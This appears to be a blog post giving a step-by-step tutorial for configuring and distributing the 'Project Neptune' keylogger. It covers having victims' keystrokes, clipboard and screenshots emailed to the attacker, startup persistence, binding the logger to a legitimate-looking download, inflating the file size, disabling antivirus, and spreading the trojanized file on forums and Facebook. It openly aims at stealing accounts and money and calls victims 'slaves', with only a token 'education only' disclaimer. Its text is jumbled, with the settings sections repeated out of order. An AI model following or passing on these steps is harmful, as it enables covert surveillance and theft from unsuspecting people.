This section of Project Neptune is used to limit the defenses of your slave. If he/she is task manager savvy and is able to identify suspicious processes, they might be able to disable the keylogger. However, if you make your keylogger very subtle, they will most likely not even notice they are being keylogged (unless you are harassing them, changing their facebook pictures, deleting game accounts, taking money from bank accounts/paypal, ect). I prefer to not disable anything. I was keylogged and the only reason I knew was because my task manager was disabled. I googled the most likely cause and found out it was due to a keylogger. If my task manager was still available to me, I probably wouldn't have noticed until all of my game accounts and ***s were stolen. So don't make the same mistake my predator did.
Example of my settings:
-Settings 3 * Instillation-
This section is not very difficult to navigate. Basically, make it so that the keylogger runs on startup for all users (option 2). It doesn't really matter where the keylogger is stored. If the file the keylogger is bound to is legit, then do nothing to it. This makes it very subtle. The keylogger is in the back and the slave has the download they wanted. For file downloading, I'm not quite sure what it's purpose is. And it most not be very important if I was able to successfully keylog multiple people without using it. Here's an example of my settings:
-Settings 4 * Extra Options-
I find this section very helpful. To be honest, I'm not quite sure when the fake error message pops up. It's not seen in the picture but to the end of mine I added "It is recommended that you restart your computer now." For whatever reason the error message pops up, when the user restarts their computer, the keylogger is re-initiated, which resolves any problems it was having.
The self destruct option is very convenient. You can only take so much from a person. Once you've stolen all of their game accounts, or whatever it is you are after, then the logs just get annoying. Set this to however long you feel necessary to get what you're after.
Screen shots are a must. They explain the confusing keystrokes. For example, my log was showing me random letters all jumbled up. I was so confused. Turned out my host was playing some word game on the internet which was clarified through the screen shots. Really all you have to do is click send at the same time as your logs. However I also did the option to set it to send every 20 minutes, just like my text logs. All this did was double email me the same image. One a text log with a SS attached, the other a blank message with a SS attached.
Example of my settings:
-Settings 5 * Server creation-
You don't have to list any server settings unless you really feel obliged to create a fake Microsoft Corp program (lol). I never did and mine turned out fine.
File pumping makes the file bigger. Say you are binding a keylogger to an empty .exe file because you're too lazy to get a real file, if you post this on the internet, it will be obviously fake. So you pump a couple megabytes into the keylogger (it really depends on the file, for ex a movie would almost a GB) and you're good to go.
Now to create your server, randomize the Mutex a few times, come up with a process name (or leave at iexplorer.exe) and click Generate new server (save it to your desktop). This creates a .exe file. Now open up the file binder and click and drag the server you just created AND a file you want it to be binded to. This means the file you want to post on the internet that works but has the keylogger installed in the background. In my screenshot I do not have the server I created in it too. (I used the screenshot to ask what i was doing wrong and was too lazy to take another). Next, right click and then left click on compile server (save this to your desktop too).
SUPER TIP: IF YOU ARE GETTING AN ERROR MESSAGE SAYING SOMETHING LIKE "Dissembler Lib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null - Cannot find the file", YOUR ANTI-VIRUS IS DELETING THE LIB FILE AND IT WILL NOT LET YOU GENERATE YOUR SERVER. TEMPORARILY DISABLE/UNINSTALL THE ANTI-VIRUS, THEN RE-EXTRACT THE LIB FILE!
Example:
Step 3: SPREAD
Now go and upload the new file onto mediafire and spread the link! Whore this out everywhere. Forums, youtube video descriptions, Facebook (depending on how evil you are and you are willing to back-stab your friends), ect.
Note: I M against the use of hacking tools it is just for education only
Thank YOU
There are many great keyloggers out there, however my favorite is Project Neptune and I will be using it for examples and designing my presentation around the settings Project Neptune provides. It has a very helpful user friendly interface and is very reliable in my, very narrow and premature, opinion. Link
Now I have nothing against any other keyloggers and, as much as it shames me, have not tried any other keyloggers. Any should work, although Project Neptune comes with a binder which is very helpful and I'm not sure that many other keyloggers do (but I could be wrong).
Step 2: Setting up the keylogger
-Settings 1 * Keylogging-
For Project Neptune you have 2 options for reviving the logs of you slave. Email is pretty basic; however depending on how well you spread your keylogger, you might notice your mailbox getting a little too full. FTP stands for File Transfer Protocol, a method of transferring files over the internet (hence the name Tongue). To do this you'll need an FTP client. I never got into FTP so I just stuck with email.
Next you get to choose the intervals that you receive logs at. I highly advise you do not go less than 20 minutes. Your mailbox will become painstakingly cluttered (especially if your slave somehow sets up the keylogger multiple times on their computer) with anything less. When you get multiple people keylogged you will thank me for this.
Logging the text on the clip board is also very handy. You might notice in your logs that the user typed "[ctrl] v [/ctrl]". Whenever you see that, go up to the clip board and that is what should be in place of the sequence.
Logging the user's specs is not necessary. However, I like to check out how much RAM people have. It humors me to see people with only 1 gig of RAM or on the contrary with 40 or so but with only a 2GHz processor. But that's just because I'm extra creepy. Wink
Email settings can be confusing. I recomend making a gmail account just because Project Neptune provides the SMTP sending server and port. It is possible to use a yahoo/hotmail/live/comcast/whatever email but you need to provide your own SMTP information; which I couldn't get to work to save my life. Most email service's SMTP info can be found via search engine. The rest is self explanatory. THE EMAIL TO SEND AND RECEIVE KEYLOGS BOTH BELONG TO YOU! I know it sounds dumb but I thought one of them had to be my slave's email. It is not. Please don't tell me how dumb I was, because I already know.
Unless you are using an FTP server, you can leave the FTP settings blank. Here's an example of my settings:
[/img]http://i1088.photobucket.com/albums/i336/nck0099/Keylogging.jpg[/img]
-Settings 2 * System Wide-
This section of Project Neptune is used to limit the defenses of your slave. If he/she is task manager savvy and is able to identify suspicious processes, they might be able to disable the keylogger. However, if you make your keylogger very subtle, they will most likely not even notice they are being keylogged (unless you are harassing them, changing their facebook pictures, deleting game accounts, taking money from bank accounts/paypal, ect). I prefer to not disable anything. I was keylogged and the only reason I knew was because my task manager was disabled. I googled the most likely cause and found out it was due to a keylogger. If my task manager was still available to me, I probably wouldn't have noticed until all of my game accounts and ***s were stolen. So don't make the same mistake my predator did.
Example of my settings:
-Settings 3 * Instillation-
This section is not very difficult to navigate. Basically, make it so that the keylogger runs on startup for all users (option 2). It doesn't really matter where the keylogger is stored. If the file the keylogger is bound to is legit, then do nothing to it. This makes it very subtle. The keylogger is in the back and the slave has the download they wanted. For file downloading, I'm not quite sure what it's purpose is. And it most not be very important if I was able to successfully keylog multiple people without using it. Here's an example of my settings:
-Settings 4 * Extra Options-
I find this section very helpful. To be honest, I'm not quite sure when the fake error message pops up. It's not seen in the picture but to the end of mine I added "It is recommended that you restart your computer now." For whatever reason the error message pops up, when the user restarts their computer, the keylogger is re-initiated, which resolves any problems it was having.
The self destruct option is very convenient. You can only take so much from a person. Once you've stolen all of their game accounts, or whatever it is you are after, then the logs just get annoying. Set this to however long you feel necessary to get what you're after.
Screen shots are a must. They explain the confusing keystrokes. For example, my log was showing me random letters all jumbled up. I was so confused. Turned out my host was playing some word game on the internet which was clarified through the screen shots. Really all you have to do is click send at the same time as your logs. However I also did the option to set it to send every 20 minutes, just like my text logs. All this did was double email me the same image. One a text log with a SS attached, the other a blank message with a SS attached.
Example of my settings:
-Settings 5 * Server creation-
You don't have to list any server settings unless you really feel obliged to create a fake Microsoft Corp program (lol). I never did and mine turned out fine.
File pumping makes the file bigger. Say you are binding a keylogger to an empty .exe file because you're too lazy to get a real file, if you post this on the internet, it will be obviously fake. So you pump a couple megabytes into the keylogger (it really depends on the file, for ex a movie would almost a GB) and you're good to go.
Now to create your server, randomize the Mutex a few times, come up with a process name (or leave at iexplorer.exe) and click Generate new server (save it to your desktop). This creates a .exe file. Now open up the file binder and click and drag the server you just created AND a file you want it to be binded to. This means the file you want to post on the internet that works but has the keylogger installed in the background. In my screenshot I do not have the server I created in it too. (I used the screenshot to ask what i was doing wrong and was too lazy to take another). Next, right click and then left click on compile server (save this to your desktop too).
SUPER TIP: IF YOU ARE GETTING AN ERROR MESSAGE SAYING SOMETHING LIKE "Dissembler Lib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null - Cannot find the file", YOUR ANTI-VIRUS IS DELETING THE LIB FILE AND IT WILL NOT LET YOU GENERATE YOUR SERVER. TEMPORARILY DISABLE/UNINSTALL THE ANTI-VIRUS, THEN RE-EXTRACT THE LIB FILE!
Example:
Step 3: SPREAD
Now go and upload the new file onto mediafire and spread the link! Whore this out everywhere. Forums, youtube video descriptions, Facebook (depending on how evil you are and you are willing to back-stab your friends), ect.
Note: I M against the use of hacking tools it is just for education only
Thank YOU
Subscribe to:
Posts (Atom)